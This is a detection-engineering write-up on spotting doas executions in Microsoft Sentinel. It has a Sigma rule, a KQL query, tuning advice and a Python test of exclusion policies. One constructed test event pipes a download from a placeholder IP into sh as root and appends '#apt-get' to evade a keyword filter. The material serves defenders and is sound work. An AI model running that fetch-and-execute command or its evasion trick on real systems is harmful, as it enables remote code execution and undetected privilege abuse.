Adversaries may use doas, a lighter alternative to sudo, to run commands as root (MITRE ATT&CK T1548, Abuse Elevation Control Mechanism). Which users may run which commands is governed by /etc/doas.conf, so an over-permissive rule there, or a compromised account that is already permitted, gives an attacker a quiet path to root. SOC teams should hunt for doas execution in Microsoft Sentinel (formerly Azure Sentinel) and triage each hit against expected administrative activity, because the rule below fires on every invocation, not only on abuse.
Detection Rule
```yaml
title: Linux Doas Tool Execution
id: 067d8238-7127-451c-a9ec-fa78045b618b
status: stable
description: Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does.
references:
    - https://research.splunk.com/endpoint/linux_doas_tool_execution/
    - https://www.makeuseof.com/how-to-install-and-use-doas/
author: Sittikorn S, Teoderick Contreras
date: 2022-01-20
tags:
    - attack.defense-evasion
    - attack.privilege-escalation
    - attack.t1548
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/doas'
    condition: selection
falsepositives:
    - Unlikely
level: low
```
Sentinel (KQL) translation, using the ASIM process-creation parser:

```kql
imProcessCreate
| where TargetProcessName endswith "/doas"
```

Both Sigma's default string matching and KQL's endswith are case-insensitive, so the translation is faithful; use endswith_cs if you only want the exact lower-case path. The rule has no exclusions of its own, so every doas invocation surfaces. Tune with the scenarios below rather than raising the level, and keep the raw hits available for hunting.
False Positives and Tuning

Scenario: A scheduled maintenance job uses doas to update packages.
Filter/Exclusion: Exclude doas invocations whose target command is apt, apt-get, yum or dnf, but only when the parent process is the scheduler (cron or a systemd timer) and the invoking script is one of the known maintenance scripts under /etc/cron.d/ or /var/spool/cron/.

Scenario: A regular user runs doas to configure network settings with ifconfig, ip or nmcli.
Filter/Exclusion: Exclude those target commands only when the invoking account belongs to the group that /etc/doas.conf actually permits for them (for example a network or admin group); a doas call to ip from any other account stays in scope.

Scenario: System administrators use doas to manage service configurations via systemctl or service.
Filter/Exclusion: Exclude systemctl, service and init invocations from known administrator accounts, and treat executions whose parent script lives under /etc/init.d/ or /usr/lib/systemd/ as service management rather than interactive escalation.

Scenario: Automated backup scripts use doas to read backup directories or run file-system checks.
Filter/Exclusion: Exclude tar, rsync and fsck when launched by a script under /opt/backup/ or /usr/local/backup/ (paths given as examples), keyed on the script path as the parent process rather than on the word appearing somewhere in the command line.

Scenario: Developers use doas to install local development tools or dependencies (npm, pip, cargo) from their home directories.
Filter/Exclusion: Exclude npm, pip and cargo executed from a user home directory (e.g. /home/user/) only for known developer accounts, and review the exclusion regularly: running a package manager as root is also exactly how a malicious package ends up installed system-wide, so keep this allowlist short.

Whatever exclusions you adopt, match on the parsed target command (the first non-option argument to doas), the parent process path and the user, not on a keyword appearing anywhere in the command line. A substring exclusion on "apt" or "tar" is trivially bypassed by an attacker who appends that word as a harmless argument or comment, and it also matches unrelated binaries (a command line containing "start" satisfies a substring check for "tar", and anything containing "script" satisfies one for "ip").
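The rule's selection and the tuning scenarios above, exercised over constructed events in Python as an added example (this is not code from the page, the Sigma rule or Sentinel). It implements the Image|endswith '/doas' match, then compares the keyword-style exclusions the scenarios describe with an allowlist keyed on the doas target command, parent process and user. The field names, accounts, paths, the backup script /opt/backup/run.sh and the IP address are assumptions, and the allowlist is hypothetical.

```python
"""
Added example, not code from the original page, the Sigma rule or Sentinel:
runs the doas selection (Image ends with '/doas') over constructed
process-creation events and compares two exclusion policies, a keyword-in-
command-line filter and a structured allowlist keyed on the doas target
command, parent process and user. Field names, accounts, paths and the IP
address are all constructed for this example.
"""
from dataclasses import dataclass
from typing import Optional
import shlex


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal stand-in for a process_creation record (constructed, ASIM-like names)."""
    image: str          # full path of the executed binary
    command_line: str   # full command line as logged
    user: str           # account that launched doas
    parent_image: str   # path of the parent process (the script or shell that ran doas)


def matches_rule(ev: ProcessEvent) -> bool:
    """Sigma selection from the rule: Image|endswith '/doas'.

    Sigma and KQL compare case-insensitively by default, so lower-case the path.
    """
    return ev.image.lower().endswith("/doas")


# Policy 1: the exclusions as literally phrased in the scenarios ("commands that include apt ...").
# Note how "ip" also matches "pip" and "script": substring checks are far too broad.
NAIVE_KEYWORDS = ("apt", "yum", "dnf", "ip", "systemctl", "tar", "rsync", "fsck", "pip", "npm", "cargo")


def naive_excluded(ev: ProcessEvent) -> bool:
    return any(keyword in ev.command_line for keyword in NAIVE_KEYWORDS)


def doas_target(argv: list) -> Optional[str]:
    """Return the program doas was asked to run, skipping doas' own options.

    doas accepts -L, -n, -s and the argument-taking -u USER and -C CONFIG; with
    getopt-style parsing '-nu root' is also legal, so any option cluster whose
    last letter is u or C consumes the following token as well.
    """
    i = 1
    while i < len(argv):
        token = argv[i]
        if token.startswith("-"):
            i += 2 if token[-1] in "uC" else 1
            continue
        return token
    return None


# Policy 2: a hypothetical allowlist, each entry pinned to (doas target, parent, user).
ALLOWLIST = {
    ("/usr/bin/apt-get", "/usr/sbin/cron", "root"): "scheduled package maintenance",
    ("/usr/bin/rsync", "/opt/backup/run.sh", "backup"): "backup job",
}


def structured_excluded(ev: ProcessEvent) -> bool:
    try:
        argv = shlex.split(ev.command_line)
    except ValueError:
        return False  # unparseable command line: never exclude silently
    target = doas_target(argv)
    if target is None:
        return False
    return (target, ev.parent_image, ev.user) in ALLOWLIST


def triage(ev: ProcessEvent, excluded) -> str:
    """'no-match' if the rule does not fire, 'excluded' if tuning suppresses it, else 'alert'."""
    if not matches_rule(ev):
        return "no-match"
    return "excluded" if excluded(ev) else "alert"


# Constructed sample events (paths, users and the TEST-NET-2 address are made up).
EVENTS = [
    ProcessEvent("/usr/bin/doas", "doas /usr/bin/apt-get -y upgrade", "root", "/usr/sbin/cron"),
    ProcessEvent("/usr/bin/doas", "doas -u root /usr/bin/rsync -a /srv /mnt/backup", "backup", "/opt/backup/run.sh"),
    # Attacker appends an allowlisted word to slip past a substring filter.
    ProcessEvent("/usr/bin/doas", "doas sh -c 'curl http://198.51.100.5/x | sh' #apt-get", "www-data", "/bin/bash"),
    ProcessEvent("/usr/bin/doas", "doas /usr/bin/pip install somepkg", "dev", "/bin/bash"),
    ProcessEvent("/usr/bin/sudo", "sudo -i", "dev", "/bin/bash"),
]


def compare(events=EVENTS) -> list:
    """Per event: (command line, verdict under the naive policy, verdict under the structured policy)."""
    return [(ev.command_line, triage(ev, naive_excluded), triage(ev, structured_excluded)) for ev in events]


if __name__ == "__main__":
    for cmd, naive, structured in compare():
        print(f"naive={naive:9} structured={structured:9} {cmd}")
```

Running it shows the third event, a reverse-download shell with "#apt-get" appended, suppressed by the keyword policy but alerted by the structured one, and the developer's pip install (event four) alerted rather than excluded because it is not on the allowlist. The sudo event never matches the rule at all, which is a reminder that this rule covers doas only.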